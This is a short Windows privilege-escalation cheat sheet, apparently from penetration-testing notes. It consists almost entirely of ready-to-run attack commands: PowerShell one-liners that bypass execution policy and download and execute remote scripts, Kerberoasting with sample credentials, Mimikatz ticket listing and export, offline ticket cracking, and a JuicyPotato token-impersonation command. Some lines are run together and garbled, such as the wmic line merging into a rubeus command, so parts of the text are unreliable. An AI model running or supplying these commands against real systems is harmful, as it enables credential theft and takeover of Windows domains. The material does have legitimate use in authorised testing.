02 Privileges Escalation
# Rubeus
# PowerShellMafia
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1'); Invoke-AllChecks -Command 'start powershell.exe'"
# Sherlock
https://github.com/rasta-mouse/Sherlock
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
# Unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v.\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234
# List available tickets
setspn.exe -t evil.corp -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
cscript.exe GetUserSPNs.ps1
# List cached tickets
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"
# Request tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
# Requesting remotely
python GetUserSPNs.py -request ECORP/morph3:supersecurepassword@127.0.0.1
# Extract tickets
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
Invoke-Mimikatz -Command '"kerberos::list /export"'
# Crack Tickets
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbihttps://github.com/ohpe/juicy-potato/releases #Pick one CLSID from here according to your system
https://github.com/ohpe/juicy-potato/tree/master/CLSID
Required tokens SeAssignPrimaryTokenPrivilege SeImpersonatePrivilege
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}Last updated